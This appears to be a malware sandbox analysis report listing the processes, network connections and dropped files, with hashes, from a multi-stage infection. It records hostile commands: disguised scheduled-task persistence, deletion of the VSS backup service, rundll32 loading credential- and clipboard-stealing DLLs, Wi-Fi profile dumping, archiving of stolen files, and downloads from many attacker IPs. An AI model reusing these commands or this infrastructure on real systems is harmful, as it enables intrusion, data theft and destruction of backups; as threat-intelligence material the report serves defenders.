C:\Users\Admin\AppData\Local\Temp\1583029623.exe
C:\Users\Admin\AppData\Local\Temp\1583029623.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
"C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
C:\Users\Admin\AppData\Local\Temp\http172.245.189.30ds.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http172.245.189.30ds.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http80.66.75.214amadey.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http80.66.75.214amadey.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe"
C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe" /F
C:\Users\Admin\AppData\Local\Temp\http149.88.90.88az.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http149.88.90.88az.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe" -service -lunch
C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http204.44.86.164193.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http204.44.86.164193.exe.exe"
C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\466504e025\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\http45.144.3.216Decrypter.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http45.144.3.216Decrypter.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http45.144.3.216excel.exe.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C sc delete VSS
C:\Windows\system32\sc.exe
sc delete VSS
C:\Users\Admin\AppData\Local\Temp\http212.227.175.227nc.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http212.227.175.227nc.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe"
C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.exe"
\??\c:\temp2\Autoit3.exe
"c:\temp2\Autoit3.exe" c:\temp2\script.a3x
\??\c:\windows\SysWOW64\cmd.exe
"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\ebakkah\hadhebc
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get domain
C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\735401866380_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\110809d565579c\clip64.dll, Main
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| AE | 77.242.250.36:443 | | tcp |
| DZ | 197.115.102.247:443 | | tcp |
| CN | 47.97.113.146:443 | | tcp |
| US | 104.21.79.165:443 | funcaptcha.ru | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| HK | 107.148.237.220:443 | | tcp |
| US | 8.8.8.8:53 | 36.250.242.77.in-addr.arpa | udp |
| HK | 103.40.161.76:443 | | tcp |
| US | 173.44.141.7:443 | | tcp |
| CN | 62.234.18.252:443 | | tcp |
| CN | 111.230.12.238:443 | | tcp |
| CN | 8.134.11.7:443 | | tcp |
| CN | 1.15.248.225:443 | | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 45.11.229.96:56001 | strompreis.ru | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| CN | 8.138.23.74:443 | | tcp |
| CN | 47.97.114.109:443 | | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| SG | 150.109.21.231:443 | | tcp |
| KR | 210.114.11.173:443 | | tcp |
| CN | 118.190.104.55:443 | | tcp |
| HK | 83.229.127.20:443 | | tcp |
| HK | 8.217.142.203:443 | | tcp |
| JP | 47.91.14.8:443 | | tcp |
| HK | 103.253.43.175:443 | | tcp |
| CN | 47.97.79.97:443 | | tcp |
| CN | 47.100.104.74:443 | | tcp |
| CN | 124.222.43.134:443 | | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 45.11.229.96:56002 | strompreis.ru | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 44.223.138.151:443 | | tcp |
| HK | 83.229.127.19:443 | | tcp |
| TM | 91.202.233.141:80 | | tcp |
| US | 104.160.18.203:443 | | tcp |
| CN | 81.69.242.80:443 | | tcp |
| US | 47.83.19.135:443 | | tcp |
| CN | 119.91.61.117:443 | | tcp |
| TM | 91.202.233.141:80 | | tcp |
| US | 35.87.126.68:443 | | tcp |
| US | 142.171.177.156:443 | | tcp |
| US | 194.36.171.35:443 | | tcp |
| SG | 47.245.94.124:443 | | tcp |
| US | 8.8.8.8:53 | 156.177.171.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.126.87.35.in-addr.arpa | udp |
| TM | 91.202.233.141:80 | | tcp |
| US | 206.189.230.244:443 | | tcp |
| HK | 103.97.179.151:443 | | tcp |
| US | 34.44.155.8:443 | | tcp |
| CN | 120.53.236.103:443 | | tcp |
| US | 8.8.8.8:53 | 244.230.189.206.in-addr.arpa | udp |
| US | 24.199.120.22:443 | | tcp |
| JP | 216.73.158.126:443 | | tcp |
| US | 8.8.8.8:53 | 8.155.44.34.in-addr.arpa | udp |
| US | 172.86.114.26:443 | | tcp |
| CN | 110.41.60.130:443 | | tcp |
| HK | 8.217.222.41:443 | | tcp |
| SG | 43.153.222.28:443 | | tcp |
| CN | 124.221.111.211:443 | | tcp |
| TM | 91.202.233.141:80 | | tcp |
| CN | 59.110.136.135:443 | | tcp |
| CN | 101.132.182.180:443 | | tcp |
| TM | 91.202.233.141:80 | | tcp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| CN | 192.144.229.25:443 | | tcp |
| BA | 77.221.27.219:40500 | | udp |
| RU | 78.36.17.105:40500 | | tcp |
| CN | 39.100.78.58:443 | | tcp |
| CN | 43.138.20.107:443 | | tcp |
| RU | 5.137.197.125:40500 | | udp |
| HK | 38.147.171.167:443 | | tcp |
| CN | 118.25.173.86:443 | | tcp |
| KZ | 178.91.66.151:40500 | | udp |
| CN | 47.93.166.228:443 | | tcp |
| CN | 8.138.43.240:443 | | tcp |
| MX | 189.173.0.44:40500 | | udp |
| KZ | 213.211.109.33:40500 | | udp |
| CN | 121.40.204.42:443 | | tcp |
| CN | 101.43.198.94:443 | | tcp |
| CN | 106.54.210.83:443 | | tcp |
| CN | 111.229.187.212:443 | | tcp |
| EG | 197.162.209.92:40500 | | udp |
| KZ | 95.59.162.2:40500 | | tcp |
| KZ | 2.135.246.18:40500 | | udp |
| CN | 106.53.181.113:443 | | tcp |
| CN | 49.232.157.82:443 | | tcp |
| KZ | 95.57.155.114:40500 | | udp |
| KZ | 89.218.234.2:40500 | | udp |
| SG | 47.236.19.63:443 | | tcp |
| HK | 47.76.230.250:443 | | tcp |
| CN | 106.55.102.97:443 | | tcp |
| SG | 8.152.170.232:443 | | tcp |
| US | 23.26.137.34:443 | | tcp |
| US | 172.245.53.132:443 | | tcp |
| CN | 101.42.247.112:443 | | tcp |
| SG | 119.8.162.77:443 | | tcp |
| UZ | 195.158.22.13:40500 | | udp |
| US | 8.8.8.8:53 | 13.22.158.195.in-addr.arpa | udp |
| CN | 112.126.77.173:443 | | tcp |
| US | 167.172.131.182:443 | | tcp |
| KZ | 2.135.207.165:40500 | | udp |
| KZ | 84.240.195.243:40500 | | tcp |
| US | 23.168.152.15:443 | | tcp |
| CN | 119.45.230.77:443 | | tcp |
| CN | 43.139.195.46:443 | | tcp |
| CN | 111.230.61.6:443 | | tcp |
| IR | 2.182.191.174:40500 | | udp |
| IR | 5.232.168.223:40500 | | tcp |
| IR | 188.212.237.201:40500 | | udp |
| CN | 120.53.120.95:443 | | tcp |
| SG | 47.236.74.146:443 | | tcp |
| KZ | 147.30.175.81:40500 | | udp |
| CN | 39.105.161.32:443 | | tcp |
| CN | 49.232.137.101:443 | | tcp |
| UZ | 213.230.69.54:40500 | | udp |
| CN | 47.93.216.2:443 | | tcp |
| CN | 101.201.54.74:443 | | tcp |
| BG | 94.232.46.54:443 | | tcp |
| CN | 110.40.138.5:443 | | tcp |
| KZ | 2.134.186.252:40500 | | udp |
| US | 103.143.248.179:80 | 103.143.248.179 | tcp |
| NL | 45.148.120.22:443 | | tcp |
| IR | 93.119.79.237:40500 | | udp |
| KZ | 213.211.109.33:40500 | | tcp |
| US | 154.9.254.227:443 | | tcp |
| CN | 116.62.169.135:443 | | tcp |
| HK | 47.243.165.127:80 | 47.243.165.127 | tcp |
| US | 8.8.8.8:53 | 227.254.9.154.in-addr.arpa | udp |
| CN | 106.14.8.52:80 | | tcp |
| US | 205.234.171.137:80 | | tcp |
| KZ | 178.89.79.66:40500 | | udp |
| HK | 156.255.2.100:80 | 156.255.2.100 | tcp |
| NL | 185.150.26.240:80 | | tcp |
| DZ | 41.102.169.93:40500 | | udp |
| CN | 47.109.106.162:80 | | tcp |
| JP | 47.245.37.54:443 | | tcp |
| CN | 124.71.136.141:80 | | tcp |
| US | 74.48.147.144:443 | | tcp |
| KZ | 2.133.69.160:40500 | | udp |
| YE | 89.189.87.223:40500 | | udp |
| US | 192.3.128.204:443 | | tcp |
| US | 70.35.206.129:80 | 70.35.206.129 | tcp |
| US | 104.254.244.97:80 | 104.254.244.97 | tcp |
| CA | 149.248.59.118:80 | | tcp |
| KZ | 92.47.86.254:40500 | | udp |
| DZ | 105.111.44.67:40500 | | tcp |
| BY | 178.124.145.4:40500 | | udp |
| KR | 141.164.41.117:80 | | tcp |
| US | 172.245.189.30:80 | 172.245.189.30 | tcp |
| FR | 194.59.30.59:80 | | tcp |
| FR | 194.59.30.59:80 | | tcp |
| KZ | 5.251.249.241:40500 | | udp |
| CI | 160.155.209.135:40500 | | udp |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| US | 69.166.230.221:80 | 69.166.230.221 | tcp |
| IR | 217.219.185.45:40500 | | udp |
| US | 8.8.8.8:53 | 214.75.66.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.185.219.217.in-addr.arpa | udp |
| US | 149.88.90.88:80 | 149.88.90.88 | tcp |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| RU | 94.228.113.30:80 | 94.228.113.30 | tcp |
| US | 204.44.86.164:80 | 204.44.86.164 | tcp |
| KZ | 77.240.41.3:40500 | | udp |
| DE | 77.91.66.70:80 | | tcp |
| CN | 115.159.47.193:80 | | tcp |
| DE | 77.91.66.70:80 | | tcp |
| UZ | 217.30.162.37:40500 | | tcp |
| RU | 45.151.62.96:80 | 45.151.62.96 | tcp |
| NL | 94.156.68.202:80 | www.requimacofradian.site | tcp |
| RU | 45.144.3.216:80 | 45.144.3.216 | tcp |
| DE | 212.227.175.227:80 | 212.227.175.227 | tcp |
| RU | 45.150.25.234:40500 | | udp |
| HK | 47.243.175.24:8444 | 47.243.175.24 | tcp |
| CN | 212.129.223.49:80 | | tcp |
| US | 34.160.111.145:80 | myexternalip.com | tcp |
| US | 8.8.8.8:53 | 145.111.160.34.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:56582 | | tcp |
| SG | 118.194.233.185:80 | 118.194.233.185 | tcp |
| CN | 60.205.226.146:80 | | tcp |
| EG | 45.242.57.22:40500 | | udp |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| IR | 217.218.196.230:40500 | | udp |
| RU | 178.68.24.192:40500 | | udp |
| RU | 80.66.75.214:80 | 80.66.75.214 | tcp |
| CN | 47.120.3.3:80 | | tcp |
| CN | 115.159.47.193:80 | | tcp |
| CN | 119.91.20.97:80 | | tcp |
| RU | 93.123.145.179:40500 | | udp |
Files
memory/4012-1-0x00007FFB305F3000-0x00007FFB305F5000-memory.dmp
memory/4012-0-0x0000019C163C0000-0x0000019C163CA000-memory.dmp
memory/4012-2-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
| MD5 | 8d8e6c7952a9dc7c0c73911c4dbc5518 |
| SHA1 | 9098da03b33b2c822065b49d5220359c275d5e94 |
| SHA256 | feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278 |
| SHA512 | 91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645 |
C:\Users\Admin\AppData\Local\Temp\httpsfuncaptcha.ruhvnc.exe.exe
| MD5 | 7557af6f3185128c25aeb092dc335975 |
| SHA1 | f0866402529be2fdc0511305da069b69a8a35b8e |
| SHA256 | 5fcee9da2e237df74b7c2619bde63db40c92c2e6c51bd483c86f83dcdfde1eab |
| SHA512 | de6375e57a674ac063aecd499d8b7ff01ebaaafb7352ce560a2468293b3d7f7b95a5ac53751728ef0578adcb5bf0518ce08f55cd7bd3edd1c13b0a4866301e9b |
C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
| MD5 | be9388b42333b3d4e163b0ace699897b |
| SHA1 | 4e1109772eb9cb59c557380822166fe1664403bd |
| SHA256 | d281e0a0f1e1073f2d290a7eb1f77bed4c210dbf83a0f4f4e22073f50faa843f |
| SHA512 | 5f887f1060b898c9a88745cde7cf509fdf42947ab8e5948b46c2df659468dc245b24d089bdbec0b314c40b83934698bf4b6feb8954e32810ff8f522aab0af19a |
memory/984-28-0x000000001B140000-0x000000001B21C000-memory.dmp
memory/984-22-0x0000000000540000-0x00000000005B4000-memory.dmp
memory/984-58-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-96-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-94-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-93-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-90-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-88-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-86-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-84-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-82-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-80-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-78-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-74-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-72-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-69-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-132-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
memory/984-70-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
memory/984-76-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-67-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-65-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-63-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-61-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-59-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-55-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-53-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-51-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-49-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-47-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-45-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-41-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-39-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-37-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-35-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-33-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-43-0x000000001B140000-0x000000001B216000-memory.dmp
memory/984-32-0x000000001B140000-0x000000001B216000-memory.dmp
memory/4012-5425-0x00007FFB305F3000-0x00007FFB305F5000-memory.dmp
memory/3176-6301-0x0000000002E80000-0x0000000002EB6000-memory.dmp
memory/3176-6302-0x0000000005550000-0x0000000005B7A000-memory.dmp
memory/3176-6303-0x0000000005480000-0x00000000054A2000-memory.dmp
memory/3176-6304-0x0000000005D70000-0x0000000005DD6000-memory.dmp
memory/3176-6305-0x0000000005DE0000-0x0000000005E46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p2pulqol.bkr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3176-6314-0x0000000005E50000-0x00000000061A7000-memory.dmp
memory/3176-6315-0x0000000006340000-0x000000000635E000-memory.dmp
memory/3176-6316-0x0000000006360000-0x00000000063AC000-memory.dmp
memory/5132-6320-0x000001EA5ABA0000-0x000001EA5ABC2000-memory.dmp
memory/3176-6330-0x000000006F230000-0x000000006F27C000-memory.dmp
memory/3176-6328-0x0000000007300000-0x0000000007334000-memory.dmp
memory/3176-6340-0x0000000006920000-0x000000000693E000-memory.dmp
memory/3176-6341-0x0000000007540000-0x00000000075E4000-memory.dmp
memory/3176-6344-0x0000000007D20000-0x000000000839A000-memory.dmp
memory/3176-6345-0x00000000076A0000-0x00000000076BA000-memory.dmp
memory/3176-6346-0x0000000007700000-0x000000000770A000-memory.dmp
memory/3176-6347-0x0000000007910000-0x00000000079A6000-memory.dmp
memory/3176-6348-0x00000000078A0000-0x00000000078B1000-memory.dmp
memory/3176-6349-0x00000000078D0000-0x00000000078DE000-memory.dmp
memory/3176-6350-0x00000000078E0000-0x00000000078F5000-memory.dmp
memory/3176-6351-0x00000000079D0000-0x00000000079EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3193133307.exe
| MD5 | af0622340ed8ba48efa92e0b2d9aca7b |
| SHA1 | 77e7181b4d4e6957cf13ba37f590cf219aac88cb |
| SHA256 | 7b7d433c6c204ed3bcd1ea74106592edfa1a30b6ef7bbc3ed21efcbadc51e526 |
| SHA512 | e1368c1c292789115b51cae549bd2d484dbc614eb3e57aa5fce324385d28e9fbddf60064b4c88237b38cded294d090d07c491b646651c45bcd6235630d94ef46 |
memory/3176-6355-0x00000000079C0000-0x00000000079C8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c5832682c75483acded1910871ed32fb |
| SHA1 | b50989ce07d133f85134f3649a3d5f119ded054a |
| SHA256 | a2994d9d3701395c9bf6e3b9c4d981d48ec91cb4c362ab91bb478ee603d02524 |
| SHA512 | 5789b50676315ebced61afed079c571538f7ffc40a1d7389f964d52c62ba5375c637af36487b87822c9d0c4a2e1f58a98d1d4f63e42dc0cddd98019304a9d307 |
memory/4012-6363-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
memory/984-6367-0x00007FFB305F0000-0x00007FFB310B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\41933479.exe
| MD5 | 4fe8dc617311f7b6a4b8ebe0b1e24090 |
| SHA1 | 2bd9341f17c8c0c62e56e1863b1d2f9c43cb30e5 |
| SHA256 | 5016e413b0c563efc920165e7235c9f2706808877668bd297b41435acc7aade4 |
| SHA512 | 910a12fbaffd45b0f797a95c6678a32c4a27adbb7d1474f183f8863d310d31fbba17d5d747da87ac4a30dd7cb22c67a4d1c25b302ef0c3f6954d91a459c692db |
C:\Users\Admin\AppData\Local\Temp\1583029623.exe
| MD5 | 41ab08c1955fce44bfd0c76a64d1945a |
| SHA1 | 2b9cb05f4de5d98c541d15175d7f0199cbdd0eea |
| SHA256 | dd12cb27b3867341bf6ca48715756500d3ec56c19b21bb1c1290806aa74cb493 |
| SHA512 | 38834ae703a8541b4fec9a1db94cfe296ead58649bb1d4873b517df14d0c6a9d25e49ff04c2bf6bb0188845116a4e894aae930d849f9be8c98d2ce51da1ef116 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 88dc70c361a22feac57b031dd9c1f02f |
| SHA1 | a9b4732260c2a323750022a73480f229ce25d46d |
| SHA256 | 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59 |
| SHA512 | 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 25506aa16cc8d6a53366ff2fca1422c0 |
| SHA1 | 4c8ed062fa6c589797660798df5e68793ddbaa45 |
| SHA256 | 73852c1215d9ef829fd689a5d709d6b5cf38ab3cfdbcc15f211d412a59b4dc71 |
| SHA512 | 453ea8c9e850c07699c4c7769a17f90e219a90d28d0fd2a61e2a19d9744caaad4debbd817147f7bf09bdacaad36536947a50cb1b64c52513b0ec6484e490ed8c |
C:\Users\Admin\AppData\Local\Temp\http103.143.248.17902.08.2022.exe.exe
| MD5 | 45651e980f6a3f54d418f925ad5f855c |
| SHA1 | 569dd0f22dea8a802d01e23ac549472c30904c72 |
| SHA256 | ef3c15be4026eb4d3f9c168d52e38cbf2c1c2f10625d713f18521c0c6e62f927 |
| SHA512 | 32966dd1f6ecfee6772ef3e5e2ea127bc4e8380be50f17dc7c7befc857b02c77edbd2c6dd98e09d549f53416cf92cb225e2aa7324b9c8c0e329a7092a36769cd |
C:\Users\Admin\AppData\Local\Temp\http172.245.189.30ds.exe.exe
| MD5 | 3b6b710da92a115329d00c5e55ad7671 |
| SHA1 | 489b2c96417490fd15419c93b953334f93581d28 |
| SHA256 | 60dd002cc2b269d41f167af937005bbf5f447df3997b4ecdf2397b9877d652ea |
| SHA512 | 6626804cacf522a9b33205a5ace276fc4de61f03a983ef5d35c8b0522b774ad48d0d58e431a07ca6089715482307b3974c5c87d65ff4ad3dd0a0008809e9578a |
memory/3576-6431-0x0000000000490000-0x00000000007D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\http80.66.75.214amadey.exe.exe
| MD5 | 107c3b33e05d1d569cccc2052e56055e |
| SHA1 | e843ffcb2d67ec5778a66abce8ee3d162831dd90 |
| SHA256 | 6338b823d5172f0321814534c1d7aff08a60132c62de48c2752c2c7dfc191228 |
| SHA512 | 86955fa11b16ffe0063fff9a57cca4c1afa8823fc6c78eaa1f23ba75182652ef55523160356017dabb61d570882f302e23f9dc8b288740588572d00666159f81 |
C:\Users\Admin\AppData\Local\Temp\http69.166.230.221112sahost.exe.exe
| MD5 | 849c7ae770318ac09e0fde466e1becfe |
| SHA1 | 964328dce9404626ed5aaf9657b5a3aee93e4b86 |
| SHA256 | 84e1d7ef0ab4497dcebb07087479a40b523745523a292cb2da040b686b537a3d |
| SHA512 | 0f702ddab102f1e358ce80e80ac7c6f8c034a0e90b279330e2af4b448752dd897bdd037a081d940244fbc35ddefe99b95b15e05e6fade8374788d5b4098933f8 |
memory/5944-6453-0x0000000000530000-0x0000000000624000-memory.dmp
memory/5944-6461-0x0000000005540000-0x0000000005AE6000-memory.dmp
memory/5944-6463-0x0000000005030000-0x00000000050C2000-memory.dmp
memory/5944-6466-0x0000000004FA0000-0x0000000004FAA000-memory.dmp
memory/5944-6471-0x0000000005520000-0x0000000005538000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\735401866380
| MD5 | 2f09c5cf42377701ab98df521c528f52 |
| SHA1 | 812847ee4f1edf590c60a4007830f5877d49225a |
| SHA256 | 9a77aed076b962b086787d3a10d5f4420bb99be45a561aff2e11cb52155e048f |
| SHA512 | 074786ae2a0f3ef0191a4de721bedd85d511ac12958186f76f8c8af5a5c573386eafdf6a1e935973f54ad63fe2a2bcce2cbfa3468e8f0ff59e5bf9ac768e7338 |
C:\Users\Admin\AppData\Local\Temp\http149.88.90.88az.exe.exe
| MD5 | b9fcbae32e294854e2507179d4acef1c |
| SHA1 | 88c7ae319270c49e2c6610e22bb54beaab533a10 |
| SHA256 | 5ee6cfb7dd10f7fecf03d515c60c8e319920ec1b99e9835f4fbcba8caa4b924c |
| SHA512 | ffd16a836c93485d71689884f1b9b114126d1f4bf3e070eeb1e6613b5337bfb19028bfe62b0339c0a38c3091cf8f1eaf286989f49b503ee06752000d85b49b99 |
C:\Users\Admin\AppData\Local\Temp\http94.228.113.30AA_v3.exe.exe
| MD5 | 90aadf2247149996ae443e2c82af3730 |
| SHA1 | 050b7eba825412b24e3f02d76d7da5ae97e10502 |
| SHA256 | ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a |
| SHA512 | eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be |
C:\ProgramData\AMMYY\settings3.bin
| MD5 | cd54c0c946d86c8c47066629b45d990f |
| SHA1 | 7762473896d6b8b361b9af116de81449ba685933 |
| SHA256 | 6fd1c5b15e6d333c8a86f2e995e280b94dbda3ab6ad75214a81e15b42debe89d |
| SHA512 | c386f9926a6f5de6183ad77e900d62cf08e919d299288417650a88ce4d242c086b8cccd49483309c06309ff04d1fdf5b6469a14f7c34f2209a5b2a6f155a4168 |
C:\Users\Admin\AppData\Local\Temp\http204.44.86.164193.exe.exe
| MD5 | 5a5ccdbe3cdd135a57f61138867932a8 |
| SHA1 | 172d5e86ce1862559546300816bcf7d2c749b4eb |
| SHA256 | 22f91304b04da17a6cb89365ddd5ad39b7bcb6fcf8d82a027381bb97e4ecb217 |
| SHA512 | b6ee3d40390fa49853522f73357264226dbca907de27da378b22702190d31ad3b9e65ba3dfb345470d380d34ebd22453a101e834a1ef123badf3a27f92079f20 |
